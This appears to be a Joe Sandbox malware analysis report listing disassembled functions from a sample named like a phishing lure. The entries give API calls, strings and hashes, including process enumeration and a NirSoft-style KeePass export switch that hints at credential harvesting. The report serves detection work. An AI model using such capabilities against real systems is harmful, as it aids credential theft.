                                                                                                                          • malloc.MSVCRT ref: 004186FE
                                                                                                                          • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                          • free.MSVCRT ref: 00418716
                                                                                                                          • free.MSVCRT ref: 0041872A
                                                                                                                          • free.MSVCRT ref: 00418749
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: free$FullNamePath$malloc$Version
                                                                                                                          • String ID: |A
                                                                                                                          • API String ID: 3356672799-1717621600
                                                                                                                          • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                                          • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                                          • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                                          • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                                          Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _wcsicmp
                                                                                                                          • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                          • API String ID: 2081463915-1959339147
                                                                                                                          • Opcode ID: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                                                                          • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                                          • Opcode Fuzzy Hash: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                                                                          • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                                          Function 004138C1 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                          • API String ID: 2012295524-70141382
                                                                                                                          • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                                                          • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                                          • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                                                          • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                                          Function 0041383D Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                          • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                          • API String ID: 667068680-3953557276
                                                                                                                          • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                          • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                                          • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                          • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                                          Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                          • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                          • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                          • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                          • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                            • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                            • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                            • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                          • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                          • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                          • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                          • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1700100422-0
                                                                                                                          • Opcode ID: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                                                                                          • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                          • Opcode Fuzzy Hash: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                                                                                          • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                          Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                          • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                          • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                          • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                          • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                          • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 552707033-0
                                                                                                                          • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                          • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                          • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                          • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                          Function 0040C084 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                                                                            • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                            • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                            • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                          • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                                          • strchr.MSVCRT ref: 0040C140
                                                                                                                          • strchr.MSVCRT ref: 0040C151
                                                                                                                          • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                          • memset.MSVCRT ref: 0040C17A
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                                          • String ID: 4$h
                                                                                                                          • API String ID: 4066021378-1856150674
                                                                                                                          • Opcode ID: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                                                                                          • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                          • Opcode Fuzzy Hash: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                                                                                          • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                          Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$_snwprintf
                                                                                                                          • String ID: %%0.%df
                                                                                                                          • API String ID: 3473751417-763548558
                                                                                                                          • Opcode ID: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                                                                                          • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                                          • Opcode Fuzzy Hash: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                                                                                          • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                                          Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                          • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                          • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                          • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                          • GetParent.USER32(?), ref: 00406136
                                                                                                                          • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                          • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                          • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                          • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                          • String ID: A
                                                                                                                          • API String ID: 2892645895-3554254475
                                                                                                                          • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                          • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                          • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                          • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                          Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                                            • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                                            • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                                            • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                                            • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                                          • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                                          • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                                          • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                                          • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                                          • memset.MSVCRT ref: 0040DA23
                                                                                                                          • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                                          • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                                          • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                                            • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                          • String ID: caption
                                                                                                                          • API String ID: 973020956-4135340389
                                                                                                                          • Opcode ID: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                                                                                          • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                                          • Opcode Fuzzy Hash: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                                                                                          • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                                          Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                                          • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                                          • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                                          • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$_snwprintf$wcscpy
                                                                                                                          • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                          • API String ID: 1283228442-2366825230
                                                                                                                          • Opcode ID: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                                                                                          • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                                          • Opcode Fuzzy Hash: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                                                                                          • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                                                          Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • wcschr.MSVCRT ref: 00413972
                                                                                                                          • wcscpy.MSVCRT ref: 00413982
                                                                                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                            • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                          • wcscpy.MSVCRT ref: 004139D1
                                                                                                                          • wcscat.MSVCRT ref: 004139DC
                                                                                                                          • memset.MSVCRT ref: 004139B8
                                                                                                                            • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                                            • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                                          • memset.MSVCRT ref: 00413A00
                                                                                                                          • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                                                          • wcscat.MSVCRT ref: 00413A27
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                          • String ID: \systemroot
                                                                                                                          • API String ID: 4173585201-1821301763
                                                                                                                          • Opcode ID: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                                                                          • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                                          • Opcode Fuzzy Hash: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                                                                          • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                                          Function 00414BB0 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: wcscpy
                                                                                                                          • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                          • API String ID: 1284135714-318151290
                                                                                                                          • Opcode ID: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
